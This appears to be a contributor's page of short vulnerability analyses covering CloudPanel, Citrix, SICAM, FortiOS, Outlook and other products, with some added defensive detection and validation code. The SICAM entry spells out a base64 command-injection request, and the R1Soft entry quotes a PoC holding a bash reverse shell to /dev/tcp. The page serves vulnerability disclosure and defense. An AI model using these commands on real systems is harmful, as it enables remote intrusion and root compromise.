cbeek-r7 (32)
cbeek-r7's Latest (15) Contributions
Technical Analysis
A significant vulnerability has been detected in CloudPanel. The root cause is attributed to the use of default secret keys and the default user being set as “clp”.
Vulnerability Description:
- No Session Authentication: CloudPanel’s file manager doesn’t enforce session authentication, resulting in a broken access control mechanism.
- Cookie Manipulation: The vulnerability can be exploited when the encrypted value of the cookie named “clp-fm” is set using the default secret key. Upon decryption, this cookie’s value is a serialized string.
- PHP Object Injection: Attackers can manipulate this decrypted serialized string to reset the user value to the default “clp”. Combined with PHP Object Injection, this can lead to more severe attacks.
- Elevated Access: The vulnerability allows attackers to gain unrestricted access to the file manager, where they can then upload malicious files to the main CloudPanel directory.
- Privilege Escalation: The default “clp” user possesses ‘sudo nopasswd’ rights, leading to a potential privilege escalation.
Technical Flow of the attack:
- The component /home/clp/htdocs/app/files/public/file-manager/backend.php receives the encrypted “clp-fm” cookie value.
- Post decryption, the value is deserialized. Exploiting this step gives attackers opportunities for post-exploitation, such as Remote Code Execution and Local File Disclosures.
- The deserialized value is utilized as an object – specifically to pass the ‘user’ value to the variable $user.
- Authentication to the file manager merely requires the “clp-fm” cookie. Once the decrypted cookie is passed, it provides backend unrestricted access. From here, the attacker can gain “clp” user rights, which essentially means root access.
In conclusion, the use of default configurations, the lack of session authentication, and the capability to inject PHP objects cumulatively pose a severe threat, enabling attackers to gain root access in systems using CloudPanel.
Technical Analysis
CVE-2023-36884 is a fixed vulnerability that permitted remote code execution. Attackers could manipulate Microsoft Office files to bypass the Mark of the Web (MoTW) security mechanism. This bypass allowed these documents to be accessed without a security prompt, facilitating remote code execution. In response to the once-mitigated but still exploited CVE-2023-36884 weakness, Microsoft rolled out an Office Defense in Depth patch as part of August 2023 Patch Tuesday.
The Russian cyber group, Storm-0978/RomCom, has been actively exploiting this flaw.
Technical Analysis
Summary:
A Cross-Site Scripting vulnerability has been discovered in the Citrix ADC and Citrix Gateway versions listed below.
Insufficient sanitization of URL query parameters before their inclusion in an HTTP Location header poses a security risk. Exploiting this vulnerability allows an attacker to create a manipulated link that, upon being clicked, redirects the victim to an arbitrary destination. Additionally, the attacker can insert newline characters into the Location header, prematurely terminating the HTTP headers and injecting an XSS payload into the response body.
Impact of vulnerability:
An attacker can leverage this vulnerability to construct malicious links that, when clicked, either redirect the victim to a website under the attacker’s control or execute JavaScript code within the victim’s browser.
Affected Software:
The following versions of Citrix ADC and Citrix Gateway are susceptible to this vulnerability:
- Citrix ADC and Citrix Gateway 13.1 before 13.1-45.61
- Citrix ADC and Citrix Gateway 13.0 before 13.0-90.11
- Citrix ADC and Citrix Gateway 12.1 before 12.1-65.35
- Citrix ADC 12.1-FIPS before 12.1-55.296
- Citrix ADC 12.1-NDcPP before 12.1-55.296
Mitigation:
Follow the Citrix reference link to update to the latest versions that will fix the issue(s).
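As an added example (not part of the original analysis or of Citrix's code), a Python validator for a redirect parameter that rejects both the header-splitting control characters and the off-site targets described above; the allow-listed host is an assumption for the example.

```python
import re
from urllib.parse import urlsplit

# Hosts this application may redirect to (constructed allow-list for the example).
ALLOWED_HOSTS = {"gateway.example.com"}

def safe_location(target: str, default: str = "/") -> str:
    """Return a value that is safe to place in a Location header, or `default`.

    The two checks mirror the two problems in the advisory: a CR/LF inside the
    value ends the header block and lets the remainder land in the response body,
    and an absolute URL to a foreign host is an open redirect.
    """
    # Reject every ASCII control character up front. urlsplit() silently strips
    # tab, CR and LF, so this check must run on the raw value, before parsing.
    if re.search(r"[\x00-\x1f\x7f]", target):
        return default
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative ("//host/...") URL: only http(s) to an
        # allow-listed host survives; .hostname already drops any user@ prefix.
        if parts.scheme not in ("", "http", "https") or parts.hostname not in ALLOWED_HOSTS:
            return default
        return target
    # Local path: must start with a forward slash. Backslashes are treated as
    # slashes by some browsers, so "/\evil.example" is rejected as well.
    if not target.startswith("/") or "\\" in target:
        return default
    return target
```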
Technical Analysis
To exploit this vulnerability, an HTTP request including the command must be crafted. No / characters can be used; therefore, commands are base64-encoded, e.g., “id” as “aWQ=”. The command must be provided in the UPLOADFILENAME header.
A full command would look like this:
echo aWQ=| base64 -d | sh #
The following header format must be obeyed:
- User-Agent: SICAM TOOLBOX II
- Session-ID: [ARBITRARY 16 CHARACTERS]
- UPLOADFILENAME: [COMMAND]
Additionally, the request body must contain the following POST parameters:
- type=20
- length=[ARBITRARY]
- data=[ARBITRARY]
If it worked, the response body will be “type=21”; congrats, you’re root now.
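As an added example, not part of the original analysis or of any Siemens tooling, a Python detector that runs over constructed request samples and flags the header pattern described above, decoding base64 tokens in the UPLOADFILENAME header so the embedded command is readable in the alert.

```python
import base64
import re

# Shell metacharacters and decode-and-run idioms that have no place in a file name.
SHELL_RE = re.compile(r"base64\s+-d|\|\s*(sh|bash)\b|[;&`$|]")
B64_RE = re.compile(r"[A-Za-z0-9+/]{2,}={0,2}")

def parse_request(raw: str) -> tuple:
    """Split a raw HTTP/1.1 request into (lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def decode_b64_tokens(text: str) -> list:
    """Best-effort decode of base64-looking tokens so an encoded command becomes visible."""
    found = []
    for tok in B64_RE.findall(text):
        if len(tok) % 4: continue          # not a complete base64 quantum
        try:
            dec = base64.b64decode(tok, validate=True).decode("ascii")
        except ValueError:                  # bad alphabet/padding or non-ASCII result
            continue
        if dec.isprintable(): found.append(dec)
    return found

def classify(raw: str) -> dict:
    """Collect indicators for one request; shell syntax or an embedded base64 string is decisive."""
    headers, body = parse_request(raw)
    filename = headers.get("uploadfilename", "")
    reasons = []
    if "sicam toolbox" in headers.get("user-agent", "").lower() and filename:
        reasons.append("toolbox-upload-with-filename")
    if SHELL_RE.search(filename):
        reasons.append("shell-syntax-in-filename")
    reasons += ["base64-in-filename:" + dec for dec in decode_b64_tokens(filename)]
    if re.search(r"(^|&)type=20(&|$)", body):
        reasons.append("upload-type-20")
    decisive = any(r.startswith(("shell-", "base64-")) for r in reasons)
    return {"suspicious": decisive, "reasons": reasons}

# Constructed sample traffic: the pattern from the advisory and a benign upload to the same endpoint.
MALICIOUS = ("POST /upload HTTP/1.1\r\nUser-Agent: SICAM TOOLBOX II\r\nSession-ID: AAAAAAAAAAAAAAAA\r\n"
             "UPLOADFILENAME: echo aWQ=| base64 -d | sh #\r\n\r\ntype=20&length=1&data=x")
BENIGN = ("POST /upload HTTP/1.1\r\nUser-Agent: SICAM TOOLBOX II\r\nSession-ID: BBBBBBBBBBBBBBBB\r\n"
          "UPLOADFILENAME: config_2023.bin\r\n\r\ntype=20&length=1&data=x")
```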
Technical Analysis
Remote Code Execution in ArcServe UDP Backup
A critical authentication bypass exists in ArcServe UDP Backup that affects versions 7.0 to 9.0.
By interacting with the service and manipulating SOAP requests, it is possible to first retrieve details about the system, including OS version, hostname, domain and administrator account name.
By forging a valid admin session with the discovered AuthUUID, it is possible to retrieve the admin password using the getLocalHostAsTrust method and request it from the ArcServe application.
The ArcServe application will return the value of the encrypted password, which can be decrypted using the scripts provided by the authors of this vulnerability (see the reference link of this submission).
Technical Analysis
A security flaw has been discovered in the client update procedure of both Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows. This vulnerability could potentially enable a local attacker with low privileges and authenticated access to elevate their privileges to the level of SYSTEM. The client update process is triggered upon the establishment of a successful VPN connection.
When a user connects to the VPN, a background process called vpndownloader.exe is initiated. This process creates a directory in the c:\windows\temp location with default permissions, following the format <random numbers>.tmp. Subsequently, vpndownloader.exe checks if the directory is empty, and if not, it proceeds to delete all files and directories within it. This particular behavior can be exploited to carry out arbitrary file deletions under the NT Authority\SYSTEM account.
The vulnerability stems from the improper assignment of permissions to a temporary directory generated during the update process. An attacker can take advantage of a specific function within the Windows installer process to exploit this vulnerability. If successfully exploited, the attacker could execute code with SYSTEM privileges.
To mitigate this vulnerability, Cisco has released software updates that specifically address the issue. Unfortunately, there are no workarounds available to rectify the vulnerability apart from applying the provided software updates.
A Proof of Concept (PoC) has been released and can be found in the reference links.
Technical Analysis
Fortinet has issued an advisory regarding a critical vulnerability in FortiOS, known as CVE-2023-25610. This vulnerability poses a significant risk of remote code execution (RCE) and affects Fortinet’s operating system. Specifically, the vulnerability resides in the administrative interface and involves a buffer underwrite bug. Exploiting this flaw, an unauthorized remote attacker can execute code by utilizing specially crafted requests.
To mitigate this vulnerability, it is crucial for affected customers to promptly apply the available patch to their FortiOS instances. Upgrading to the patched versions is highly recommended to ensure system security.
CVE-2023-25610 is a buffer underwrite (or “buffer underflow”) exploit that impacts the administrative interface of FortiOS and FortiProxy. It arises when a program writes data to a buffer with a size smaller than the data itself, resulting in the overwrite of adjacent memory locations.
Exploiting this vulnerability could empower an unauthenticated attacker to remotely execute arbitrary code on the device or launch a denial-of-service (DoS) attack on the graphical user interface (GUI). To carry out such an attack, the malicious actor would need to send specifically crafted requests to the target device.
It is worth noting that a proof of concept for this vulnerability was published on March 11, which increases the likelihood of it being exploited in real-world scenarios.
Wiz Research data reveals that approximately 9% of cloud enterprise environments remain vulnerable to this particular flaw. Moreover, among environments utilizing FortiOS, a staggering 80% have yet to apply the necessary patch to safeguard against it.
This marks another critical vulnerability discovered in FortiOS this year, with the previous instance, CVE-2022-42475, being rapidly exploited in the wild shortly after its disclosure. Therefore, it is anticipated that this latest vulnerability will likely face similar exploitation, especially with a few public exploit examples being available.
The following product versions are affected by CVE-2023-25610:
- FortiOS versions 7.2.0 through 7.2.3
- FortiOS versions 7.0.0 through 7.0.9
- FortiOS versions 6.4.0 through 6.4.11
- FortiOS versions 6.2.0 through 6.2.12
- All versions of FortiOS 6.0
- FortiProxy versions 7.2.0 through 7.2.2
- FortiProxy versions 7.0.0 through 7.0.8
- FortiProxy versions 2.0.0 through 2.0.11
- All versions of FortiProxy 1.2
- All versions of FortiProxy 1.1
Fortinet has also acknowledged the potential vulnerability impact on other products. However, in those cases, an attacker would only be able to initiate a denial-of-service (DoS) attack rather than achieve remote code execution (RCE).
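As an added example, not from the original analysis or from Fortinet, a Python check that transcribes the affected ranges listed above and triages a constructed inventory; version strings are compared on their major.minor.patch prefix only, and the hostnames and build numbers are illustrative.

```python
import re

# Affected ranges from the advisory as (product, first, last), both ends inclusive.
# A `last` of None means every release sharing that major.minor prefix is affected.
AFFECTED = [
    ("FortiOS", "7.2.0", "7.2.3"),
    ("FortiOS", "7.0.0", "7.0.9"),
    ("FortiOS", "6.4.0", "6.4.11"),
    ("FortiOS", "6.2.0", "6.2.12"),
    ("FortiOS", "6.0", None),
    ("FortiProxy", "7.2.0", "7.2.2"),
    ("FortiProxy", "7.0.0", "7.0.8"),
    ("FortiProxy", "2.0.0", "2.0.11"),
    ("FortiProxy", "1.2", None),
    ("FortiProxy", "1.1", None),
]

def parse_version(text: str) -> tuple:
    """Turn 'v7.2.3', '7.2.3,build1234' or '6.0' into a comparable tuple of ints."""
    m = re.match(r"v?(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups(default="0"))

def is_affected(product: str, version: str) -> bool:
    """True when `version` of `product` falls inside one of the advisory's ranges."""
    v = parse_version(version)
    for prod, first, last in AFFECTED:
        if prod.lower() != product.lower():
            continue
        lo = parse_version(first)
        if last is None and v[:2] == lo[:2]:
            return True
        if last is not None and lo <= v <= parse_version(last):
            return True
    return False

def needs_patch(inventory: list) -> list:
    """Hostnames from an inventory of (host, product, version) rows that are still exposed."""
    return [host for host, product, version in inventory if is_affected(product, version)]

# Constructed sample inventory; hostnames and build numbers are illustrative, not real devices.
INVENTORY = [
    ("fw-edge-01", "FortiOS", "v7.2.3,build1234"),
    ("fw-edge-02", "FortiOS", "v7.2.4,build1234"),
    ("fw-dc-01", "FortiOS", "v6.0.15"),
    ("proxy-01", "FortiProxy", "7.0.9"),
    ("proxy-02", "FortiProxy", "2.0.11"),
]
```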
Technical Analysis
The vulnerability was detected in version 1.1.2 of the MiniDLNA service within the firmware version 2.1.6 Build 20220128 rel.15823(4555) of the TP-Link AX1800 WiFi 6 Router Archer AX20(EU). The exploit requires either physical access or LAN access to the router. It could potentially enable an attacker to execute arbitrary code on the device, thereby granting unauthorized access and control over the router.
Technical Analysis
Microsoft reported having been notified by Cert-UA of a zero-day vulnerability in Outlook. This vulnerability was observed to be used by nation-state actors targeting Ukraine’s government, military, energy, and transport sectors during mid-April and December 2022.
By sending malicious Outlook notes and tasks, the attackers were able to steal NTLM hashes via NTLM negotiation requests by forcing the targets’ devices to authenticate to attacker-controlled SMB shares. These obtained credentials were used for lateral movement within the victim’s networks.
Attackers are able to craft an email that contains an extended MAPI property called PidLidReminderFileParameter for either a calendar appointment, note or task. This property can contain a remote UNC path to an SMB (TCP port 445) share on a threat actor-controlled server. The malicious email does not require any user interaction, and the vulnerability can be triggered without either reading the email or viewing the email in preview mode; it will be triggered automatically when the Outlook client receives and processes the email. Upon processing the malicious email, Outlook will access the UNC path to the attacker-controlled SMB share, which allows an attacker to perform an NTLM relay attack and access other internal systems.
CVE-2023-23397 impacts all supported versions of Microsoft Outlook for Windows but doesn’t affect Outlook for Android, iOS, or macOS versions.
Outlook on the web and Microsoft 365 do not support NTLM authentication and are not vulnerable to CVE-2023-23397.
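As an added example (not part of the original analysis or of Microsoft's own scanning script), a Python scan over constructed message records that flags any PidLidReminderFileParameter value naming a remote host, ranking hosts outside the organisation highest; the message record layout and the internal domain suffix are assumptions for the example.

```python
import ipaddress
import re
from typing import Optional

PROPERTY = "PidLidReminderFileParameter"         # property named in the advisory
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")          # \\host\share\file.wav
FILE_URL_RE = re.compile(r"^file://([^/]+)/", re.I)  # file://host/share/file.wav
INTERNAL_SUFFIXES = (".corp.example",)              # constructed allow-list of internal DNS names

def reminder_target_host(value: str) -> Optional[str]:
    """Host that Outlook would contact to fetch the reminder sound, or None if the path is local."""
    value = value.strip()
    m = UNC_RE.match(value) or FILE_URL_RE.match(value)
    return m.group(1) if m else None

def is_external(host: str) -> bool:
    """True when the host is neither a private/loopback address nor an internal DNS name."""
    try:
        return not ipaddress.ip_address(host).is_private
    except ValueError:                                # not an IP literal: judge by DNS suffix
        return not host.lower().endswith(INTERNAL_SUFFIXES)

def scan_messages(messages: list) -> list:
    """Flag every message whose reminder property points at a host; external hosts rank high.

    A reminder sound on any SMB share is unusual enough to review, because fetching it
    is exactly the step that leaks the NTLM negotiation described above.
    """
    findings = []
    for msg in messages:
        host = reminder_target_host(msg.get(PROPERTY) or "")
        if host is None:
            continue
        findings.append({"id": msg["id"], "host": host,
                         "severity": "high" if is_external(host) else "medium"})
    return findings

# Constructed sample records; the property values are illustrative, not captured data.
MESSAGES = [
    {"id": "msg-1", PROPERTY: "C:\\Windows\\Media\\Alarm01.wav"},
    {"id": "msg-2", PROPERTY: "\\\\share.example.net\\sounds\\reminder.wav"},
    {"id": "msg-3", PROPERTY: "\\\\nas01.corp.example\\audio\\ping.wav"},
    {"id": "msg-4", PROPERTY: "file://10.20.30.40/share/ping.wav"},
    {"id": "msg-5"},
]
```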
Technical Analysis
A vulnerability in Microsoft’s Word wwlib allows attackers to get RCE with the privileges of the victim who opens a malicious RTF document. An attacker would be able to deliver this payload in several ways, including as an attachment in spear-phishing attacks.
Affected Versions
This vulnerability affects at least the following versions of Microsoft Office:
- Microsoft Office 365 (Insider Preview – 2211 Build 15831.20122 CTR)
- Microsoft Office 2016 (Including Insider Slow – 1704 Build 8067.2032 CTR)
- Microsoft Office 2013
- Microsoft Office 2010
- Microsoft Office 2007
Acknowledgement
This issue was discovered, analyzed, and reported by Joshua J. Drake (@jduck).
PoC code from @jduck:
Technical Analysis
The “ZK” Framework is an open-source Java framework for building enterprise web and mobile applications. The R1Soft Server Backup Manager utilises this framework.
By bypassing the authentication process, uploading a custom and weaponized database driver (JDBC) that contains a payload for creating a remote shell on the device is possible. Excerpt from one of the public PoCs with a detail of the weaponized JDBC driver:
```java
static {
    String winCmd = "dir";
    String linuxCmd = "bash -i >& /dev/tcp/192.168.1.0/2022 0>&1";
    String[] cmds = null;
    if (System.getProperty("os.name").toLowerCase().contains("win")) {
        cmds = new String[]{"cmd.exe", "/c", winCmd};
    } else {
        cmds = new String[]{"/bin/bash", "-c", linuxCmd};
    }
```
One of the Incident Response blogs in the referrals from Fox-IT mentions that activity since November 2022 has been observed where this software has been compromised and a backdoor is running on these systems.
Technical Analysis
Recent reports on ransomware actors’ activity in 2022 abusing vulnerabilities during their attacks marked this particular vulnerability as being used. Once inside the network of a victim, this particular vulnerability can be used to elevate privileges and execute code under administrative rights.
Technical Analysis
Fortinet’s researcher Gwendal Guégniaud discovered an RCE vulnerability in the Fortinet NAC (Network Access Control) device. The vulnerability in the keyUpload.jsp file allows an unauthenticated attacker to write arbitrary files on the system. As a result, the uploaded code will be executed under the user rights of root.
Since these types of devices sit at the network perimeter of companies, they are an interesting target, as we have observed in many ransomware attacks, where the initial attack starts by compromising a network perimeter device.
With the release of a PoC by Horizon3ai, ShadowServer’s honeypots have already reported scanning activity.
The exploit has been tested and works against vulnerable devices:
Yes, in case the exploit code is hidden as an attachment, the user should open that attachment.